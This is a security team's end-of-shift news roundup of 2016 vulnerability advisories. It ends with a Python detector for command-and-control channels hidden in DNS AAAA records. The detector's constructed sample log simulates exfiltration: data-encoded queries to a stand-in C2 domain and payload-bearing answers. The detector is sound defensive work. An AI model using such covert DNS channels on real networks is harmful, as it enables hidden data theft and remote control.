This advisory was originally posted to the US-CERT secure Portal library on June 21, 2016, and is being released to the NCCIC/ICS-CERT web site. This advisory contains mitigation details for authentication vulnerabilities in the Rockwell Automation FactoryTalk EnergyMetrix application.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-173-03
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 25-07-2016 18:00 − Dienstag 26-07-2016 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** Devices with Qualcomm modems safe from critical ASN.1 telecom flaw ***
---------------------------------------------
Despite initial concerns, smartphones equipped with Qualcomm modems are not vulnerable to a recently announced vulnerability that could potentially allow attackers to take over cellular network gear and consumer mobile ..
---------------------------------------------
http://www.cio.com/article/3099688/devices-with-qualcomm-modems-safe-from-c…
*** Patchwork cyberespionage group expands targets from governments to wide range of industries ***
---------------------------------------------
Symantec finds that Patchwork now targets a variety of industries in the US, China, Japan, South East Asia, and the UK.
---------------------------------------------
http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expand…
*** Bugtraq: [security bulletin] HPSBGN03630 rev.1 - HP Operations Manager for Unix, Solaris, and Linux using Apache Commons Collections (ACC), Remote Code Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539001
*** Trump, DNC, RNC Flunk Email Security Test ***
---------------------------------------------
Donald J. Trump has repeatedly bashed Sen. Hillary Clinton for handling classified documents on her private email server, even going so far as to suggest that anyone who is so lax with email security isn’t fit to become ..
---------------------------------------------
http://krebsonsecurity.com/2016/07/trump-dnc-rnc-flunk-email-security-test/
*** Bugtraq: July 2016 - Bamboo Server - Critical Security Advisory ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539003
*** DFN-CERT-2016-1197: Perl: Two vulnerabilities allow, among other things, execution of arbitrary code ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1197/
*** Mobile networks: security flaw also makes smartphones attackable ***
---------------------------------------------
According to security researchers, large parts of the mobile network infrastructure are exposed through a flaw in a software library. A fix is available, but most devices will probably never receive an update.
---------------------------------------------
http://www.golem.de/news/mobilfunk-sicherheitsluecke-macht-auch-smartphones…
*** Amazon Silk browser removes Google’s default encryption ***
---------------------------------------------
Google’s good intentions of keeping searches made via its search engine protected through default encryption have been stymied by Amazon. A bug in the Amazon Silk ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/26/amazon-silk-bug-encryption/
*** 50+ vulnerabilities found in popular home gateway modems/routers ***
---------------------------------------------
Researcher Gergely Eberhardt with Hungarian security testing outfit SEARCH Laboratory has unearthed over fifty vulnerabilities in five home gateway modems/routers used by Hungarian Cable TV operator UPC Magyarország, but also by many ISPs around the ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/26/home-gateway-modems-vulnerabilit…
*** Citrix XenServer Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer that may allow a malicious administrator of a PV guest VM to compromise or crash the host.
---------------------------------------------
https://support.citrix.com/article/CTX214954
*** Low-cost wireless keyboards open to keystroke sniffing and injection attacks ***
---------------------------------------------
Bastille Networks researcher Marc Newlin has discovered a set of security vulnerabilities in low-cost wireless keyboards that could be exploited to collect all passwords, security questions, sensitive personal, bank account and ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/26/keystroke-sniffing-wireless-keyb…
*** DFN-CERT-2016-1199: Xen: Two vulnerabilities allow, among other things, gaining administrator privileges ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1199/
*** Command and Control Channels Using "AAAA" DNS Records, (Tue, Jul 26th) ***
---------------------------------------------
Data exfiltration and command-and-control channels via DNS are nothing new. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21301
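The ISC diary above describes C2 traffic carried in AAAA answers; a 16-byte IPv6 address is a convenient container for a chunk of payload, and the resolver happily forwards both the query and the answer. The following is an added detection example written for this report, not code from the diary. It assumes a constructed resolver log in a hypothetical "timestamp client qtype qname -> answer" format and flags a domain on three signals: many distinct AAAA answers for one base domain, high-entropy leftmost labels in the queries (data going out), and answers that fall outside the 2000::/3 global unicast range (data coming back that was never meant to be routed).

```python
"""Heuristic detector for command-and-control channels hidden in AAAA records.

Added example for this shift report; not from the ISC diary. The log format
and every log line below are constructed for the demonstration.
"""
import ipaddress
import math
import re
from collections import defaultdict

# Hypothetical resolver log format: "<time> <client> <qtype> <qname> -> <answer>".
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>[A-Z]+)\s+(?P<qname>\S+)\s+->\s+(?P<answer>\S+)$"
)

# Answers for real hosts come from 2000::/3; anything else in an AAAA reply is odd.
GLOBAL_UNICAST = ipaddress.IPv6Network("2000::/3")

# Constructed sample: normal traffic for example.com / example.net, plus a host
# (10.0.0.7) talking to a C2 domain with encoded labels and payload-bearing answers.
SAMPLE_LOG = """\
12:00:01 10.0.0.5 AAAA www.example.com -> 2606:2800:220:1:248:1893:25c8:1946
12:00:02 10.0.0.5 A    www.example.com -> 93.184.216.34
12:00:03 10.0.0.5 AAAA mail.example.com -> 2001:db8:10::25
12:00:04 10.0.0.6 AAAA cdn.example.net -> 2001:db8:20::1
12:00:05 10.0.0.6 AAAA cdn.example.net -> 2001:db8:20::2
12:00:06 10.0.0.6 AAAA cdn.example.net -> 2001:db8:20::3
12:00:07 10.0.0.7 AAAA mf2wi3ldnrsxg5aq.cc.evil-c2.example -> 4d5a:9000:0003:0000:0004:0000:ffff:0000
12:00:08 10.0.0.7 AAAA n5xw2zlonrwwc3tj.cc.evil-c2.example -> b800:0000:0000:0000:4000:0000:0000:0000
12:00:09 10.0.0.7 AAAA onsw2ylpfzzgc3ti.cc.evil-c2.example -> 2001:db8:1:2:3:4:5:6
12:00:10 10.0.0.7 AAAA ge2dknbugi4tkmzq.cc.evil-c2.example -> 0e1f:ba0e:00b4:09cd:21b8:014c:cd21:5468
12:00:11 10.0.0.7 AAAA ovzxi3tfebzwk5tf.cc.evil-c2.example -> 6973:2070:726f:6772:616d:2063:616e:6e6f
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded data sits well above plain hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname: str, levels: int = 2) -> str:
    """Collapse a query name to its registrable-ish suffix (naive: last two labels)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-levels:])


def parse_log(text: str):
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()


def analyze(text: str, entropy_threshold: float = 3.0, distinct_threshold: int = 4) -> dict:
    """Return {base_domain: [reasons]} for domains showing AAAA covert-channel traits."""
    distinct_answers = defaultdict(set)
    high_entropy_labels = defaultdict(int)
    off_range_answers = defaultdict(int)

    for rec in parse_log(text):
        if rec["qtype"] != "AAAA":
            continue
        dom = base_domain(rec["qname"])
        leftmost = rec["qname"].split(".")[0]
        # Outbound data: long, random-looking leftmost label.
        if len(leftmost) >= 8 and shannon_entropy(leftmost) >= entropy_threshold:
            high_entropy_labels[dom] += 1
        try:
            addr = ipaddress.IPv6Address(rec["answer"])
        except ValueError:
            continue  # malformed answer; not our concern here
        # Inbound data: every answer differs, and many are not routable addresses.
        distinct_answers[dom].add(addr)
        if addr not in GLOBAL_UNICAST:
            off_range_answers[dom] += 1

    findings = {}
    for dom in set(distinct_answers) | set(high_entropy_labels):
        reasons = []
        if len(distinct_answers[dom]) >= distinct_threshold:
            reasons.append(f"{len(distinct_answers[dom])} distinct AAAA answers")
        if high_entropy_labels[dom]:
            reasons.append(f"{high_entropy_labels[dom]} high-entropy query labels")
        if off_range_answers[dom]:
            reasons.append(f"{off_range_answers[dom]} answers outside 2000::/3")
        if reasons:
            findings[dom] = reasons
    return findings


if __name__ == "__main__":
    for dom, reasons in sorted(analyze(SAMPLE_LOG).items()):
        print(f"{dom}: {'; '.join(reasons)}")
```

Round-robin CDNs and some DNS-based load balancers legitimately return several AAAA records, so the distinct-answer count on its own is noisy; the combination of randomised labels with answers outside 2000::/3 is the signal worth paging on. In production the thresholds belong in config and the base-domain split should use a public-suffix list rather than the last two labels.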
*** DFN-CERT-2016-1200: Moodle: Multiple vulnerabilities allow, among other things, disclosure of information ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2016-1200/